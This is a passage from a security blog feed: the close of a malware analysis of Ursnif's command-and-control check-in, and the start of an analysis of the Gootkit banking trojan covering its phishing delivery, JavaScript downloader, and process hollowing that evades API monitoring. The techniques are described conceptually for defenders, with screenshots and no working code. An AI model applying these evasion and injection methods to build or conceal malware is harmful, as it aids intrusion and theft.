&lt;p&gt;It&apos;s really appreciated if you want to share new keys that you find with us. Feel free to contact us on &lt;a href=&quot;https://twitter.com/Certego_IRT&quot;&gt;Twitter&lt;/a&gt; or &lt;a href=&quot;https://www.linkedin.com/company/certego&quot;&gt;LinkedIn&lt;/a&gt;&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;4.Injected Internet Explorer? Or not?&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;While investigating the check-in phase, we noticed an unusual fact that we think it&apos;s worth to mention.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 499px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/108baf550e9cf43b5baf291d80ea2df7/119c7/MalwareTalesDreambot8.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 36.45833333333333%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAIAAACHqfpvAAAACXBIWXMAAAsTAAALEwEAmpwYAAABUklEQVR42k3Q2W6CUBAGYF7EVgUMoOJKVy/6AqZRkUU2BSxt5EKtghw2UUxfu0NsmyZfTv7kLDNzMIZ3ydGqbx8f3nPu7dRfZtzyBIG1TowRU0pAqaighTU9BoQa0lrUMGJc8rGm4hV7CqJVEP5CfxgV1ZTgyUoEJxnZ4dDw7w3EGhE18zFy7JRf3baddayMnccNI6L1iFkkpBLA21dVya+JHivtmtIOVkLYVYV9abzFBnO3rqLuMuvCffPYXqTsIm2ZaXMe1/WooRcdQugtz5xz6dinrpU9v1/unBwOYAS/JvnN7WRNyAcoAisxOxCyT8wCKA6hKnoAF/c4vylPNjS/aUwhbG/Gawwfrl4Et6mjwerr8SPnnLzn5P3CGbSsFAapG1HbTH9aM9OenQFGC7HS0OU0ROlJRfDAtc5/xcwifGpAyR5MWxc/2/KelPaV6fYbOrKM0Ojh01sAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;MalwareTalesDreambot8&quot;
        title=&quot;&quot;
        src=&quot;/website/static/108baf550e9cf43b5baf291d80ea2df7/119c7/MalwareTalesDreambot8.png&quot;
        srcset=&quot;/website/static/108baf550e9cf43b5baf291d80ea2df7/804b2/MalwareTalesDreambot8.png 384w,
/website/static/108baf550e9cf43b5baf291d80ea2df7/119c7/MalwareTalesDreambot8.png 499w&quot;
        sizes=&quot;(max-width: 499px) 100vw, 499px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;As you can see from the analysis of &lt;a href=&quot;https://app.any.run/tasks/f5db6637-090d-46cb-82b3-baba73fc4d66/&quot;&gt;AnyRun&lt;/a&gt; , the malicious beacon seems to be sent by an Internet Explorer instance after the malware has run.&lt;/p&gt;
&lt;p&gt;Considering that Ursnif is known to perform injection on browsers to steal information, an unaware analyst could think that the malware already decided to perform some form of memory injection into a new spawned instance of Internet Explorer to masquerade the communication as a legit one.&lt;/p&gt;
&lt;p&gt;However this is unecessary. It&apos;s enough to use the COM (&lt;a href=&quot;https://en.wikipedia.org/wiki/Component_Object_Model&quot;&gt;Wikipedia&lt;/a&gt;) library that is provided by Microsoft.
Looking at the code, we can detect this behaviour with the finding of the function CoCreateInstance that were made just before the network communication.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1109px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/1eaaae812437cf777629ad9027b373c5/8cae4/MalwareTalesDreambot9.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 24.739583333333332%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAIAAADKYVtkAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA6ElEQVR42iXNyW6DMBCAYd7/mXLIiabtqapEIOzGbN4xxtiUxDVE+g8jjb6ZYBXErdPQ5G0ZCwhwmykx5knI8M1Z+VrR06fZU/M/Rd/DmR9YIBDfF1kk9+/wCpMYPCI2wtv9N41+RhhRctEiVKxRbJS0XyayCHSGfcGumTMCd0UPUtEBK5Ezc51dq/JTD9SI1lnuVu7stE29HpKNgY1DSytLqhOvnHTlUKdz18wY7gv/erR9UxuMtnn0p488loNB2cGYXxUG5Qd+HbjCbUFhodngjMzySxp/UNALUnv29scbK902nym3qX815RUDX0SrvwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;MalwareTalesDreambot9&quot;
        title=&quot;&quot;
        src=&quot;/website/static/1eaaae812437cf777629ad9027b373c5/8cae4/MalwareTalesDreambot9.png&quot;
        srcset=&quot;/website/static/1eaaae812437cf777629ad9027b373c5/804b2/MalwareTalesDreambot9.png 384w,
/website/static/1eaaae812437cf777629ad9027b373c5/e5715/MalwareTalesDreambot9.png 768w,
/website/static/1eaaae812437cf777629ad9027b373c5/8cae4/MalwareTalesDreambot9.png 1109w&quot;
        sizes=&quot;(max-width: 1109px) 100vw, 1109px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;This one is a stealthy way that could mislead both analysts and security products if it has not been taken in consideration.&lt;/p&gt;
&lt;p&gt;If you like to have a more detailed explanation on COM and, in general, on how to detect malware C2 communications while reverse engineering, I suggest the following reading: &lt;a href=&quot;https://www.mandiant.com/resources/blog/reversing-malware-command-control-sockets&quot;&gt;FireEye Blog&lt;/a&gt;&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;5.Conclusions&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;Ursnif has been trying for years to make analysis difficult for people and detection for security products.&lt;/p&gt;
&lt;p&gt;We went deep into the communication performed during the check-in phase and created a new tool to help to analyze and detect the malware.&lt;/p&gt;
&lt;p&gt;Certego is actively monitoring every day threats to improve its detection and response methods, continuously increasing the effectiveness of the incident response workflow.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;Hash&lt;/strong&gt;&lt;/h1&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;9406ff0da0f238466f7638490ad4335d&quot;&gt;&lt;pre class=&quot;language-9406ff0da0f238466f7638490ad4335d&quot;&gt;&lt;code class=&quot;language-9406ff0da0f238466f7638490ad4335d&quot;&gt;8793af5f5ad8a2ca9b2ae6af5e70e63f
8f0195472ede691b129913465eec0c9e&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If you know something more about protocols used by Ursnif for C2 communications or if you&apos;d like to improve the tool(&lt;a href=&quot;https://github.com/mlodic/ursnif_beacon_decryptor/tree/master&quot;&gt;GitHub&lt;/a&gt;), feel free to contact me at any time.&lt;/p&gt;
&lt;h1&gt;Author:&lt;/h1&gt;
&lt;h3&gt;Matteo Lodi, Threat Intelligence Team Leader&lt;/h3&gt;</content:encoded></item><item><title><![CDATA[Malware Tales: Gootkit]]></title><description><![CDATA[Today we are going to start a new series of blog posts called “Malware tales”: the intent is to go deep on code-level analysis of most widespread malware to allow everyone to get a better picture of everyday cyber threats.]]></description><link>https://www.certego.net/blog/blog-gootkit/</link><guid isPermaLink="false">blog-gootkit</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><category><![CDATA[Malware]]></category><dc:creator><![CDATA[Matteo Lodi, Threat Intelligence Lead Engineer]]></dc:creator><pubDate>Wed, 13 Feb 2019 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;Summary&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;The Threat&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;Payload Delivery&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;Gootkit executable&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;Stage 1: Packed Gootkit&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;Stage 2: Gaining a foothold&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;Stage 3: Check-in phase&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;Last stage&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;Additional findings&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;Conclusions&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h1&gt;&lt;strong&gt;1.The Threat&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;Gootkit belongs to the category of Infostealers and Bankers therefore it aims to steal information available on infected machines and to hijack bank accounts to perform unwanted transactions.&lt;/p&gt;
&lt;p&gt;It has been around at least since 2014 and it seems being actively distributed in many countries, including Italy.&lt;/p&gt;
&lt;p&gt;Previous reports about this threat can be found following this link: &lt;a href=&quot;https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit&quot;&gt;Malpedia&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Today we are going to dive into the analysis of a particular variant that came up the last week.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;2.Payload Delivery&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;The infection vector is an email written in Italian. In this case adversaries used one of the most common social engineering techniques to trigger the user to open the attachment&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 588px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/ce800160f3a27c47f596b5dda2d607b3/9bbaf/gootkit1.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 87.23958333333333%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAIAAABSJhvpAAAACXBIWXMAAAsTAAALEwEAmpwYAAACL0lEQVR42p1SyY4TMRDtT+H/uCEhxIdwA/ENIG6c0DBcOTDSZDJL4u4kvXlp92I7dtvmdXeiwBw4UHouVdlVZddzJSHE5xhtCMHrwldfO/q0fsizrKzrJsbnkUn8S8Kk9CF2vxz5GL+/+PT+9ctXH968fff5yzVOvPd/RiddfwTaziyYXSsPPxvybRDb+7v11Y/bq+ubdEeVdueAExLKB4AJxYSGXlzaeCZjzY+ys0qPgGhMzYbT6RnJ8hhnrdHKje55C/+UBH1b65RSQ98Pw3A8Wm3McRILmZWFPeO42M6NF8KwW9c15bw5C+NczAZllAsOoYzVlGIHum3bhbkpGQ5J012rWa+F4F3fCyEYY9BlWQgujDHOojP0r6C11pfkqqoI2e4rek92eX7IsoyQVIimg/QdSqOKlBKenKWREuVOyZyx1Wr19PhANpvDLIQQPBzl/TjiKoRCgxEUcm4iCFN0SjZGl2WFBzPG50taSikMPHQcx+WFiMbNSMbOhW0s+APYHpTWBgbYhj3Mq5USHc4fFwysYcDHxhAuyf8ty5DE7SberuL6LhZ5XK/jzU2sDyamm0DSkKaRpPH+YQrabuNmGx8fo1JTMnpyzheFz3O/y3xVzcY+SmZjVfiyDJRFykKWTceIA/Z7r7QPIcFYAn7UblQgEr9odMdZznhdccEaWXFWgL++1/OxwjjC0BqcJ1WjqTTQvT5NHz6ma7tpWvthGVvwDPKmYT0P6jy19jeIW8o0UDgLIwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;gootkit1&quot;
        title=&quot;&quot;
        src=&quot;/website/static/ce800160f3a27c47f596b5dda2d607b3/9bbaf/gootkit1.png&quot;
        srcset=&quot;/website/static/ce800160f3a27c47f596b5dda2d607b3/804b2/gootkit1.png 384w,
/website/static/ce800160f3a27c47f596b5dda2d607b3/9bbaf/gootkit1.png 588w&quot;
        sizes=&quot;(max-width: 588px) 100vw, 588px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The downloaded file is a heavily obfuscated Javascript file called &quot;GLS_Notifica.js&quot;. If the user opens it, the native Javascript interpreter wscript.exe would be executed by default and it would perform the following HTTP request:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 709px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/c1a8480da6415dd67ea204b89acd916c/4d08a/gootkit2.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 8.333333333333332%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAARElEQVR42pWMOQ4AIQwD+f9LCc7RJGm9wAvYYmTJ0syICAJKd6e50cyIhbuqyu7+xTghEbnyAnYclDl3/PyLmcmqeuYDVNqZHakl1ScAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;gootkit2&quot;
        title=&quot;&quot;
        src=&quot;/website/static/c1a8480da6415dd67ea204b89acd916c/4d08a/gootkit2.png&quot;
        srcset=&quot;/website/static/c1a8480da6415dd67ea204b89acd916c/804b2/gootkit2.png 384w,
/website/static/c1a8480da6415dd67ea204b89acd916c/4d08a/gootkit2.png 709w&quot;
        sizes=&quot;(max-width: 709px) 100vw, 709px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The result is the download of a cabinet file that is an archive file which can be extracted natively by Windows. Inside there is a Portable Executable file that is saved into the &lt;em&gt;&lt;strong&gt;%TEMP%&lt;/strong&gt;&lt;/em&gt; folder (“C:\Users&amp;#x3C;username&gt;\AppData\Local\Temp”) and launched.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Javascripts downloaders&lt;/strong&gt;&lt;/em&gt; are a common payload delivery because a little obfuscation can be enough to make them very difficult to be detected by antivirus engines.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1122px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/6266856cd7d5dbbe15dfb75183549778/62a6a/gootkit3.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 33.33333333333333%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAIAAACHqfpvAAAACXBIWXMAAAsTAAALEwEAmpwYAAABGElEQVR42kVQW07EMAzM/Y/DFxeAFVcApG5FH3k4TtLmUW/bDc6uBKORNbI9thMhpUwpaa2H4Wccx2EYuq6b5slaADBPGsN1jqxAKVgX8/KKbx+jeL9cUk6tAsDOvu+nhpE5z/9CKf00Pxrh2su+HwV+fm8p+xCWEHgENljnMATvvWOyCN5x5s9stNFKKiXFkffMd+ccc4u5lGVd2f8cwWyao0OwoE2jVPpx3SRSPuhGtG3FOYqRUqbYhqQU287g+VHJYUKMPqzoVosBLF8VQhBxXSpjP+p1qIDVYLWuxlTPk5fy7a06m/ojW97YmnLdqN4bBP9jKeVWCn11pIGMJUBS+rZGa3mDO4+7xkl7SQxu2/dGovM8fwGDiIeNAqZTCAAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;gootkit3&quot;
        title=&quot;&quot;
        src=&quot;/website/static/6266856cd7d5dbbe15dfb75183549778/62a6a/gootkit3.png&quot;
        srcset=&quot;/website/static/6266856cd7d5dbbe15dfb75183549778/804b2/gootkit3.png 384w,
/website/static/6266856cd7d5dbbe15dfb75183549778/e5715/gootkit3.png 768w,
/website/static/6266856cd7d5dbbe15dfb75183549778/62a6a/gootkit3.png 1122w&quot;
        sizes=&quot;(max-width: 1122px) 100vw, 1122px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;3.Gootkit executable&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;First run of the sample in an automated environment revealed that something new was added in this version. As we can see in the following images, malware authors added a new layer of protection to the malicious agent. The comparison has been made with a variant spread during December of 2018 in Italy. images are from &lt;a href=&quot;https://any.run&quot;&gt;AnyRun&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 522px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/41311314e5afefba04fcf083badd0d2c/29492/gootkit4.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 23.177083333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAIAAADKYVtkAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA/0lEQVR42mMw9M9U8ks3SKgxT2sxTGowTmk0TW3US2rQSqxXi6pERqpRVSrRCKQaU8XgEFFokdFikt6sE1+jG18LQgm12nE1QKQVW41AcTUuWS2eGY0uaQ2uafWu6SCSQdY/VyMsXz4gTy2qQh1sg3o0iASarRxZoRpZoRxRrhRephheZhZeZBdeYBMGQtah+XZhhQwSflm2cZkmibW2Oe3m6c2WGS0gMrPVKLXZILnRJL1FP6ke6Ba9hFqz9BYTkKeajJMbgGrM05oZxHxzdGJKtBMb5UNL5UJKgCSEoRBaqgBilyiGlQGRQni5U2y5V2SBZ1SRe0SBV3SRT3QRALgQZfhuGzSEAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;gootkit4&quot;
        title=&quot;&quot;
        src=&quot;/website/static/41311314e5afefba04fcf083badd0d2c/29492/gootkit4.png&quot;
        srcset=&quot;/website/static/41311314e5afefba04fcf083badd0d2c/804b2/gootkit4.png 384w,
/website/static/41311314e5afefba04fcf083badd0d2c/29492/gootkit4.png 522w&quot;
        sizes=&quot;(max-width: 522px) 100vw, 522px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 518px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/260d2f9c372f5346fd3afbc5dbb15e0d/6b9fd/gootkit5.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 44.79166666666667%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAIAAAC9o5sfAAAACXBIWXMAAAsTAAALEwEAmpwYAAABxklEQVR42l2RW4/SUBSF+wvM6PhgYjRDoRcKLTDCUE28PBg1woDjYOkp9EIpdBptZ7i3tPRQICb+a3fhSZMvOzsn2XuttQ+RabvV9piRZ2+c33X7UB3thGHCGZjtr/+DUSPuSEGPmP66NMAE9f1BRDManrQo3w8BNuWfMboXXA7iL2NcNiJeW0MV9LBmYeK86RW//bpo3eV7QWW4LQ1i2MLqMaUEObQ6kUUrFq3K8vyFtHh55Hlnxqhr4rx1/166Fy1csw8wXDEx+OEHGLwV1BAWAZwaCuZWvDt8tfHnEW46u0/W5qOdEI8b7sWNx8pTsjNhekFeDaHmlIBEfk7xSbTKdJcnaGlW705fyzOgLk1E1SfOGl6u671CDoeWonOA9VfjXeV4tksrKZmY1zdFLSqDsr2vj5KiuS2Pdvwwqdl74knTfXb9k+5OSWmRkRaU4ueQT0FOOQV6Ul4CEFuQ5x/kSfbHlJKm2dsHvh8QT5vuo4ZXvHZqt07FjN+5f+r2vjbeCRaIb8tWwmnpFxT1DcTm4BZGzJuYM+KSuU2Hzxoue+NdGVHJ2nN6BIIU8mkl5dSAkYIW8npYVf2Wtmgbq87Af6vM/wJVvbRsWP9hbwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;gootkit5&quot;
        title=&quot;&quot;
        src=&quot;/website/static/260d2f9c372f5346fd3afbc5dbb15e0d/6b9fd/gootkit5.png&quot;
        srcset=&quot;/website/static/260d2f9c372f5346fd3afbc5dbb15e0d/804b2/gootkit5.png 384w,
/website/static/260d2f9c372f5346fd3afbc5dbb15e0d/6b9fd/gootkit5.png 518w&quot;
        sizes=&quot;(max-width: 518px) 100vw, 518px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;This means that the original program was “packed” with the aim to slow down reverse engineers and to make ineffective static analysis tools like Yara rules.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;4.Stage 1: Packed Gootkit&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;In such cases, a malware analyst knows that he has to extract the original payload as fast as possible without losing time to try to understand the inner workings of this stage.&lt;/p&gt;
&lt;p&gt;A great open-source tool exists which can resolve the problem in a matter of seconds. It’s called &lt;em&gt;&lt;strong&gt;PE-Sieve&lt;/strong&gt;&lt;/em&gt; &lt;a href=&quot;https://github.com/hasherezade/pe-sieve&quot;&gt;GitHub&lt;/a&gt;. Even though it does not always work, in this case it can dump the unmapped version of the original executable because the malicious software uses a technique called &lt;em&gt;&lt;strong&gt;Process Hollowing&lt;/strong&gt;&lt;/em&gt; a.k.a. &lt;em&gt;&lt;strong&gt;RunPE&lt;/strong&gt;&lt;/em&gt;. This method consists in starting a new process in a suspended state, “hollowing” out the content of the process, replacing it with malicious code and, finally, resuming the thread.&lt;/p&gt;
&lt;p&gt;In the image we can see that the 6th parameter of &quot;CreateProcessW&quot; was set to &quot;4&quot;, indicating that the process will start in a suspended state.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1227px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/386efe5bf40b2c28c9683a49958ca861/2bfc7/gootkit6.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 38.802083333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAIAAAB2/0i6AAAACXBIWXMAAAsTAAALEwEAmpwYAAABk0lEQVR42hWO226cMBRF+f/fqNSXSH3oU6tUbRW1kZJOpmFgwGDMYIMxN5uLzR2GutLS0dkPe2kbbz+frNOfyPdwAM3Lu+VYEYIhMkkEEseJHSchN0qiwPd94JEQIQiBcw18L/ChwaAjcDCJfGlLhl0p8lWSoTMXRXaRH115zM19bFJ6U6e3lZG+K2RFFaeCESOjIc/wNoj7WCcRnBS/D80+tIvks6r2QWyq0uWqoJsH9iwZZTl35SKrY+2MPEa6vI/1qnjo2Z1gU5uNLRubTOt7kWq0ui5oS29LQQ9t10zNMbcGjSDDQV9ns6ySECjBtr7ehnrt60VxHdde3KcOhxBc/iaemyOfIZ8SVKTEaCtWZXFdUu3mWdxyNv4fXE9KaOa+7kQ2NCUC16fHx9Pz7xC6nmsB23TNs+G7tqM/+6Kvc3kPrhZGEAdeHIWMkpwl59fnX9+/gvNL5tmxbXIMywTplUNTGBFyI+iSAGAEYuQVCAmCZ1kuqtp6LgX78e3Lw8cPnz89dDwd2kJyJnmqeNqK/B88Ya4ZCEd8GwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;gootkit6&quot;
        title=&quot;&quot;
        src=&quot;/website/static/386efe5bf40b2c28c9683a49958ca861/2bfc7/gootkit6.png&quot;
        srcset=&quot;/website/static/386efe5bf40b2c28c9683a49958ca861/804b2/gootkit6.png 384w,
/website/static/386efe5bf40b2c28c9683a49958ca861/e5715/gootkit6.png 768w,
/website/static/386efe5bf40b2c28c9683a49958ca861/2bfc7/gootkit6.png 1227w&quot;
        sizes=&quot;(max-width: 1227px) 100vw, 1227px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;We are talking about a well known technique that is easily detectable with the monitoring of the Windows API calls that are needed to perform the injection. But here comes the trick.&lt;/p&gt;
&lt;p&gt;Following the flow of execution we couldn’t find all the needed API calls: we got NtCreateProcess, NtGetContextThread, NtReadVirtualMemory and NtSetContextThread.&lt;/p&gt;
&lt;p&gt;The most important ones that are used by monitoring applications to detect the technique were missing:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;NtUnmapViewOfSection to “hollow” the target process&lt;/li&gt;
&lt;li&gt;NtWriteVirtualMemory to write into the target process&lt;/li&gt;
&lt;li&gt;NtResumeThread to resume the suspended thread&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Let’s find out what’s happening!&lt;/p&gt;
&lt;p&gt;After some shellcode injections inside its memory space, the process executes a call to IsWow64Process API that is used by the application to understand if the process is running under the WOW64 environment &lt;a href=&quot;https://it.wikipedia.org/wiki/WOW64&quot;&gt;(Wiki)&lt;/a&gt; : this is a subsystem of the Windows OS that is able to run 32-bit applications, like this one, on 64-bit operating systems.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 803px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/ae227e129d9e3296fd5f96db97af617f/e1031/gootkit7.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
